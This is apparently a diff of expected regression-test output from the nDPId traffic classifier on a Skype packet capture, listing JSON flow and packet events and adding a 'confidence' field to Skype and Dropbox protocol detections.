 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"skype.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1431969655399,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"ts_msec":1431969655399,"pkt":"0NQSxnP1PBXCt3IOCABFAAAysnAAAEARTIvAqAEib91KGDLdnEEAHsG9m6gCfNYVHSc6jWjicVy5t1mw5NpUpQ=="}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":516,"source":"skype.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969655399,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":516,"source":"skype.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969655399,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":517,"source":"skype.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969655400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"skype.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1431969655400,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"ts_msec":1431969655400,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9FyIAAEAR57bAqAEib91KMDLdnEgAKadmm6oC656jqkVeUmOjjlOF7oTonkHhDKTP6NWeDWkwfWY5"}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"skype.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969655400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":13021,"dst_port":40008,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"skype.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969655400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":13021,"dst_port":40008,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":518,"source":"skype.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969655400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"skype.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1431969655400,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1431969655400,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4PBwAAEARwsfAqAEib91KKjLdnFgAJKhzm6wCYALzkzdu\/LrNPcT4NWmc+JYpVJ3L9m5YbQ=="}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"skype.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969655400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"skype.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969655400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":519,"source":"skype.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969655400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"skype.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1431969655400,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"ts_msec":1431969655400,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1xDsAAEARa1jAqAEi1cezkjLdgQkAIXwbm64C\/E7GKHTAnqTXhScHNyy9JU+1q7MSwg=="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"skype.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969655400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"skype.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969655400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":533,"source":"skype.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":533,"source":"skype.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1431969656410,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969656410,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8yZkAAEARz2bAqAEinTeCrzLdnEYAKHoim7AC0Uz4eUhtRx+U2n96ruKge0mKrTm6r7jfF82JDy4="}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":533,"source":"skype.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":533,"source":"skype.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":534,"source":"skype.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.162","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"skype.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1431969656410,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1431969656410,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+lOIAAEARTinAqAEinTc4ojLdnEQAKlJUm7IC63nFT7uUV5k0L358bPvax6aIijF38KySzDuXwNYHgA=="}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":534,"source":"skype.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.162","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":534,"source":"skype.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.162","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":535,"source":"skype.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"skype.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1431969656410,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1431969656410,"pkt":"0NQSxnP1PBXCt3IOCABFAAA43x4AAEARCHPAqAEinTg0ITLdnEsAJM3am7QChNdFtOWmIsBdiMlrk7loIt\/AHz17BjRqJg=="}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"skype.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"skype.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":536,"source":"skype.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.172","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"skype.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1431969656410,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969656410,"pkt":"0NQSxnP1PBXCt3IOCABFAABAA\/QAAEAR92XAqAEib91NrDLdnEoALEKJm7YClKE3lTfT0DUQisSOS4KG\/La+hJBP5DfxaCwxffHTvFZU"}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":536,"source":"skype.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.172","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":536,"source":"skype.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.172","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":537,"source":"skype.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"skype.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1431969656410,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"ts_msec":1431969656410,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1zB8AAEARzPbAqAEinTeCoDLdnF0AIXcUm7gCbIFVwo6Azkv+1yCNquXcTTuKbOiUHg=="}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":537,"source":"skype.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":537,"source":"skype.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":539,"source":"skype.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656652,"flow_last_seen":1431969656652,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431969656652,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01114{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"skype.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1431969656652,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"ts_msec":1431969656652,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAAISRnsAAEARcJbAqAEi\/\/\/\/\/0RcRFwB\/vqceyJob3N0X2ludCI6IDE1NzMxOTU0NDUsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"skype.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656652,"flow_last_seen":1431969656652,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431969656652,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"skype.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656652,"flow_last_seen":1431969656652,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431969656652,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":540,"source":"skype.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656652,"flow_last_seen":1431969656652,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431969656652,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01110{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"skype.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1431969656652,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"ts_msec":1431969656652,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAAISynkAAEARKfDAqAEiwKgB\/0RcRFwB\/jf1eyJob3N0X2ludCI6IDE1NzMxOTU0NDUsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="}
-00612{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":540,"source":"skype.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656652,"flow_last_seen":1431969656652,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431969656652,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
